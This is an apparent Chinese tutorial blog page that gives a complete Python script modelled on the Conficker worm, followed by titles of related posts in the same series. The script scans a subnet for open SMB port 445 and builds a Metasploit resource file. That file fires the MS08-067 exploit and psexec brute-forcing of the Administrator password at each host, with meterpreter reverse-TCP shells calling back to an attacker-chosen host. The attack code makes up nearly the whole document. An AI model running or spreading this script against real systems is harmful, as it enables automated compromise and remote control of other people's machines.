【Python脚本进阶】2.4、conficker蠕虫(终)
完整
脚本能扫描可能的目标, 利用MS08_067漏洞, 并通过暴力猜测密码远程执行一个进程。
最后, 还要在main()函数中添加一些参数解析代码,然后调用刚才编写的那些函数, 以完成脚本的编写。
import os import optparse import sys import nmapdef findTgts(subNet):nmScan = nmap.PortScanner()nmScan.scan(subNet, '445')tgtHosts = []for host in nmScan.all_hosts():if nmScan[host].has_tcp(445):state = nmScan[host]['tcp'][445]['state']if state == 'open':print('[+] Found Target Host:' + host)tgtHosts.append(host)return tgtHostsdef setupHandler(configFile, lhost, lport):configFile.write('use exploit/multi/handler\n')configFile.write('setPAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')configFile.write('set LPORT ' + str(lport) + '\n')configFile.write('set LHOST ' + lhost + '\n')configFile.write('exploit -j -z\n')configFile.write('setg DisablePayloadHandler 1\n')def confickerExploit(configFile, tgtHost, lhost, lport):configFile.write('use exploit/windows/smb/ms08_067_netapi \n')configFile.write('set RHOST ' +str(tgtHost) +'\n')configFile.write('set PAYLOAD '+ 'windows/meterpreter/reverse_tcp\n')configFile. write ('set LPORT ' +str(lport) + '\n')configFile. write ('set LHOST ' +lhost +'\n')configFile. write ('exploit -j -z\n')def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):username = 'Administrator'pF = open( passwdFile, 'r' )for password in pF.readlines():password = password.strip('\n').strip('\r')configFile.write('use exploit/windows/smb/psexec\n')configFile.write('set SMBUser ' + str(username) + '\n')configFile.write('set SMBPass ' + str(password) + '\n')configFile.write('set RHOST ' + str(tgtHost) + '\n')configFile.write('set PAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')configFile.write('set LPORT ' + str(lport) + '\n')configFile.write('set LHOST ' + lhost + '\n')configFile.write('exploit -j -z\n')def main():configFile = open('meta.rc', 'w')parser = optparse.OptionParser('[-] Usage%prog ' + '-H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address [es]')parser.add_option('-p', dest='lport', type='string', help='specify the listen port')parser.add_option('-l', dest='lhost', type = 'string', help='specify the listen address')parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt')(options, args) = parser.parse_args()if (options.tgtHost == None) | (options.lhost == None):print(parser.usage)exit(0)lhost = options.lhostlport = options.lportif lport == None:lport = '1337'passwdFile = options.passwdFiletgtHosts = findTgts(options.tgtHost)setupHandler(configFile, lhost, lport)for tgtHost in tgtHosts:confickerExploit(configFile, tgtHost, lhost, lport)if passwdFile != None:smbBrute(configFile, tgtHost, passwdFile, lhost, lport)configFile.close()os.system('msfconsole -r meta.re')if __name__ == '__main__':main()
【Python脚本进阶】2.4、conficker蠕虫(终)相关推荐
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(终)
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- 【Python脚本进阶】2.1、端口扫描器(下):NMAP端口扫描
目录 一.简介 1.1.扩展 1.2.端口扫描类型 1.3.实现: 一.简介 1.1.扩展 由TCP连接扫描脚本,到其他类型的扫描,Nmap端口扫描工具包提供了大量的功能,如提供的ACK.RST.FI ...
- 【Python脚本进阶】1.3、第二个脚本:Zip文件口令破解机
目录 一.简介 概述: 二.示例 示例: 优化 提高性能 任意性 注: 测试方法: 一.简介 概述: 编写Zip文件口令破解机要学习zipfile 库的使用方法 打开Python解释器, 我们用hel ...
- 【Python脚本进阶】2.1、端口扫描器(上):TCP全连接扫描
目录 一.简介 1.1.基础: 1.2.TCP: 二.TCP全连接扫描 2.1.简介: 2.2.函数: 2.3.实现: 第一步:获得主机名和端口 第二步: connScan和portScan函数 第三 ...
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(中):使用Ftplib暴力破解FTP用户口令
一.简介 1.1.概述: 虽然匿名访问是进入系统的方式之一, 但攻击者也能成功地用偷来的用户名/密码访问合法的FTP 服务器.FileZilla 之类的FTP 客户端程序往往将密码以明文形式存储在配置 ...
- 【Python脚本进阶】2.3、利用FTP与Web批量抓“ 肉机”(下):在FTP服务器上搜索网页+注入代码
目录 一.在FTP服务器上搜索网页 1.1.函数: 1.2.实现: 二.在网页中加入恶意注入代码 2.1.分析: 2.2.函数: 2.3.实现: 一.在FTP服务器上搜索网页 1.1.函数: ftp. ...
- 使用PyInstaller2将Python脚本转化为可执行文件(下-进阶使用)
<使用PyInstaller2将Python脚本转化为可执行文件(下-进阶使用)>,作者:balian,原文链接:http://www.cnblogs.com/balian/archive ...
- 蠕虫病毒Worm: VBS/Jenxcus!lnk 解决方案 Python脚本
表现:U盘里所有根目录文件夹/文件都变成了快捷方式. 传播方式:U盘.多发于打印店等无保护公共设备. 原因:文件夹/文件属性被设为隐藏的系统文件 Win+R //进入cmd E: //进入U盘 att ...
- 年薪20万Python工程师进阶(7):Python资源大全,让你相见恨晚的Python库
我是 环境管理 管理 Python 版本和环境的工具 pyenv – 简单的 Python 版本管理工具. Vex – 可以在虚拟环境中执行命令. virtualenv – 创建独立 Python 环 ...
- .bat脚本自动yes_第四章: Python脚本获取聚宽(JQData)免费行情数据
本期目标: 从聚宽数据API中获取期权行情数据并写入到云数据库(MySql)中,通过superset访问存储在数据库中的数据. 本期导读: 聚宽金融数据API 获取ETF期权日终行情 数据写入到MyS ...
最新文章
- linux awk语法格式,Awk是什么?一文带运维小白快速掌握Linux Awk用法
- 计算机辅助制造实验感想6,中南大学计算机辅助制造实验报告1
- 一道暴力枚举题Win32版本示例
- JavaScript获取当前日期时间
- Go语言基础:method
- 图标字体iconfont的使用
- ASP.NET Core MVC+EF Core从开发到部署
- [JavaWeb-JavaScript]JavaScript_Array数组对象
- 修改mysql数据引擎的方法- 提高数据库性能
- graph slam tutorial :从推导到应用3
- rabbitmq多个消费者_选型必看:RabbitMQ 七夕 Kafka,差异立现
- 文字转语音真人发声app哪个好用?几个好用的手机文字转语音软件
- 条码枪接入智能网关,通过条码查询数据库,数据写入PLC寄存器
- 大数据第一季--Hadoop(day4)-徐培成-专题视频课程
- 蛤蟆 Oracle,19.蛤蟆的Oracle杂记——数据字典dba_views
- 贸易大时代:代理IP助力企业出海
- Debian11之Docker稳定版本安装
- html5新特性的理解
- 外挂、破解软件理论与实战
- 背后的力量 | 推动智慧校园建设 华云数据帮助昆明卫生职业学院重塑IT架构